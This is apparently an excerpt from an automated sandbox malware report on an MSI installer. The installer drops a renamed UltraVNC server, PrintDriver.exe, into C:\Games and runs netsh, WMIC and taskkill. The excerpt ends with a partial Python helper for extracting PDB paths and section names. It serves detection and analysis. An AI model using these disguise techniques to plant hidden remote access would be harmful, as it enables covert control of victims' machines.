Source: C:\Windows\SysWOW64\cmd.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mrmcorer.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ureg.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ureg.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Games\PrintDriver.exe Section loaded: apphelp.dll
Source: C:\Games\PrintDriver.exe Section loaded: version.dll
Source: C:\Games\PrintDriver.exe Section loaded: wtsapi32.dll
Source: C:\Games\PrintDriver.exe Section loaded: userenv.dll
Source: C:\Games\PrintDriver.exe Section loaded: dwmapi.dll
Source: C:\Games\PrintDriver.exe Section loaded: iphlpapi.dll
Source: C:\Games\PrintDriver.exe Section loaded: uxtheme.dll
Source: C:\Games\PrintDriver.exe Section loaded: profapi.dll
Source: C:\Games\PrintDriver.exe Section loaded: sspicli.dll
Source: C:\Games\PrintDriver.exe Section loaded: napinsp.dll
Source: C:\Games\PrintDriver.exe Section loaded: pnrpnsp.dll
Source: C:\Games\PrintDriver.exe Section loaded: wshbth.dll
Source: C:\Games\PrintDriver.exe Section loaded: nlaapi.dll
Source: C:\Games\PrintDriver.exe Section loaded: mswsock.dll
Source: C:\Games\PrintDriver.exe Section loaded: dnsapi.dll
Source: C:\Games\PrintDriver.exe Section loaded: winrnr.dll
Source: C:\Games\PrintDriver.exe Section loaded: fwpuclnt.dll
Source: C:\Games\PrintDriver.exe Section loaded: rasadhlp.dll
Source: C:\Games\PrintDriver.exe Section loaded: dhcpcsvc.dll
Source: C:\Games\PrintDriver.exe Section loaded: kernel.appcore.dll
Source: C:\Games\PrintDriver.exe Section loaded: windows.storage.dll
Source: C:\Games\PrintDriver.exe Section loaded: wldp.dll
Source: C:\Games\PrintDriver.exe Section loaded: riched32.dll
Source: C:\Games\PrintDriver.exe Section loaded: riched20.dll
Source: C:\Games\PrintDriver.exe Section loaded: usp10.dll
Source: C:\Games\PrintDriver.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Games\PrintDrivers.exe Section loaded: windows.storage.dll
Source: C:\Games\PrintDrivers.exe Section loaded: wldp.dll
Source: C:\Games\PrintDrivers.exe Section loaded: kernel.appcore.dll
Source: C:\Games\PrintDrivers.exe Section loaded: uxtheme.dll
Source: C:\Games\PrintDrivers.exe Section loaded: propsys.dll
Source: C:\Games\PrintDrivers.exe Section loaded: profapi.dll
Source: C:\Games\PrintDrivers.exe Section loaded: edputil.dll
Source: C:\Games\PrintDrivers.exe Section loaded: urlmon.dll
Source: C:\Games\PrintDrivers.exe Section loaded: iertutil.dll
Source: C:\Games\PrintDrivers.exe Section loaded: srvcli.dll
Source: C:\Games\PrintDrivers.exe Section loaded: netutils.dll
Source: C:\Games\PrintDrivers.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Games\PrintDrivers.exe Section loaded: sspicli.dll
Source: C:\Games\PrintDrivers.exe Section loaded: wintypes.dll
Source: C:\Games\PrintDrivers.exe Section loaded: appresolver.dll
Source: C:\Games\PrintDrivers.exe Section loaded: bcp47langs.dll
Source: C:\Games\PrintDrivers.exe Section loaded: slc.dll
Source: C:\Games\PrintDrivers.exe Section loaded: userenv.dll
Source: C:\Games\PrintDrivers.exe Section loaded: sppc.dll
Source: C:\Games\PrintDrivers.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Games\PrintDrivers.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: ureg.dll
Source: C:\Windows\SysWOW64\mode.com Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Installer\MSI4384.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\msiexec.exe File written: C:\Games\UltraVNC.ini
Source: C:\Games\PrintDriver.exe File opened: C:\Windows\SYSTEM32\RICHED32.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: rs8dpaIe6D.msi Static file information: File size 7064064 > 1048576
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdbGCTL source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\x64\Release\vnchooks.pdb source: vnchooks.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\x64\Release\UVncVirtualDisplay.pdb source: UVncVirtualDisplay.dll.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\ddengine\x64\Release\ddengine.pdb source: ddengine.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdb source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: powercfg.msi.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: rs8dpaIe6D.msi, MSI4075.tmp.1.dr, MSI3ECB.tmp.1.dr, 603b50.msi.1.dr, MSI3F98.tmp.1.dr, MSI3F39.tmp.1.dr, MSI3FE7.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: UVncVirtualDisplay.dll.1.drStatic PE information: section name: _RDATA
                  Source: ddengine.dll.1.drStatic PE information: section name: .SharedD
                  Source: vnchooks.dll.1.drStatic PE information: section name: _RDATA
                  Source: PrintDriver.exe.1.drStatic PE information: section name: _RDATA
                  Source: MSI3ECB.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3F39.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3F98.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3FE7.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI4075.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI4384.tmp.1.drStatic PE information: section name: .fptable
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A019 push ecx; ret 3_2_0044A02C
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A50CC push ecx; ret 4_2_005A50DF
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A5676 push ecx; ret 4_2_005A5689
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84EC4 push 6FFDC5CAh; ret 26_2_00007FF67DA84ECA
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84F10 push 6FFDC5C3h; iretd 26_2_00007FF67DA84F16
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84A14 push 6FFDC5D5h; iretd 26_2_00007FF67DA84A1A
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84566 push 60F5C5F1h; iretd 26_2_00007FF67DA8456E
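The PDB paths and section names listed above are the static indicators most worth pulling out of every dropped file at once: the winvnc.pdb and vnchooks.pdb paths show that PrintDriver.exe is a build of the UltraVNC server (winvnc) that has simply been renamed, while the custact\viewer.pdb and AICustAct.pdb paths belong to the MSI's custom-action helpers. The following Python is an added example, not code from this report, from Joe Sandbox or from the UltraVNC project. It reads the COFF section table and carves CodeView RSDS records (4-byte signature, 16-byte GUID, 4-byte age, NUL-terminated path) from raw bytes, so it also works on memory dumps. build_sample_pe() is a constructed stand-in header carrying the winvnc.pdb path seen above, not a loadable executable, and KNOWN_SECTIONS is an assumed triage baseline, not a standard.

```python
import struct
from typing import List

# Section names commonly emitted by the MSVC toolchain. This baseline is an assumption
# for triage, not a formal standard: names outside it (e.g. _RDATA, .SharedD, .fptable
# in this report) are merely worth a closer look, not proof of anything.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                  ".rsrc", ".reloc", ".tls", ".bss", ".CRT", ".gfids", ".00cfg"}


def pe_section_names(data: bytes) -> List[str]:
    """Return the names in the COFF section table: MZ -> e_lfanew -> 'PE\\0\\0' -> headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER (20 bytes)
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size                          # IMAGE_SECTION_HEADER[] (40 bytes each)
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]    # Name is the first 8 bytes
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def unusual_sections(names: List[str]) -> List[str]:
    """Section names outside the baseline, in the order they appear in the image."""
    return [n for n in names if n not in KNOWN_SECTIONS]


def pdb_paths(data: bytes) -> List[str]:
    """Carve CodeView RSDS records: b'RSDS' + 16-byte GUID + 4-byte age + NUL-terminated path.
    Scanning raw bytes instead of walking the debug directory works on dumps and overlays too."""
    paths = []
    pos = data.find(b"RSDS")
    while pos != -1:
        start = pos + 4 + 16 + 4
        end = data.find(b"\0", start)
        if end != -1:
            path = data[start:end]
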